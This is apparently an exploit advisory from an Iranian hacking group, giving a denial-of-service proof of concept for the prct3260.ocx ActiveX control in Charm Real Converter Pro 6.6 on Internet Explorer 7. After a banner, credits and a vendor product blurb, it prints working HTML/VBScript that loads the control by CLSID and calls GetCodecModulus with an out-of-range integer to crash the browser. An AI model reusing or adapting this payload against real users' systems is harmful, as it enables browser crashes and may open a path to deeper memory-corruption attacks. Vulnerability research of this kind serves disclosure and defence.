|
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
""" :::::: :: :: :: :: :: :::: """
""" :: :: :: :: :::::: .. :::: :: """
""" ::::: ::: ::::: :: :: :: :: :: :::: """
""" :: :: :: :: : :: :: :: :: :: :: """
""" :::::: :: :: ::::: :: :::::: :: :: :::: rs.ir """
""" :: """
""" """
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Anti-Security Research Team & Security Institute
#[+] Bug : Charm Real Converter pro 6.6 Activex (prct3260.ocx) Denail of Service Expl0it
#[+] program Download : http://www.dvdtoreal.com/
#[+] Author : the_Edit0r
#[+] Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP2 with Internet Explorer 7
#[+] web site: Expl0iters.ir * Anti-security.ir
#[+] Big thnx: Aria-Security Team & H4ckcity Member
# Part Description :
--------------------
Charm Real Converter Pro includes all functions of "Charm Real Converter" and
"Charm Dvd To Real converter".In addition,it also supports convert the WMV or
WMA format to the Real format. It lets you easily to convert AVI,MPEG,MP3,WAV,
WMV,WMA,QuickTime,VCD,DVD and the most popolar media files to Real Media files.
It supports batch convertion. We offer the professional scheme for you setting
the detailed parameter of conversion in order to get the better effect. With a
simple and very easy-to-use interface, and customizable settings, it is perfect
for either novice or advanced content creators.Charm Real Converter Pro supports
the following media formats: "avi, mov, qt, mpg, mpeg, mpa, mp2,mp3,wav,wmv,mwa,
au, dat and vob files".Convert AVI to RM.Convert MPEG-1 to RM.Convert Mp2 to RM,
Mp3 to RM.Convert Wmv to RM, Wma to RMConvert Wav to RM.Convert Quick Time to RM.
Convert VCD to RM.Convert DVD to RM.Edit RM files message.It's easy and fast.Very
User-friendly interface.
# Part Expl0it & Bug Codes ( Poc ) :
------------------------------------
targetFile = "E:\Program Files\Charm Real Converter Pro\tools\prct3260.ocx"
------------------------------------
<object classid='clsid:F4F647AD-B160-11D2-A3EF-00104BDF4755' id='target' />
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
arg1=-2147483647
arg2=1
target.GetCodecModulus arg1 ,arg2
</script>
</span></span>
</code></pre>
|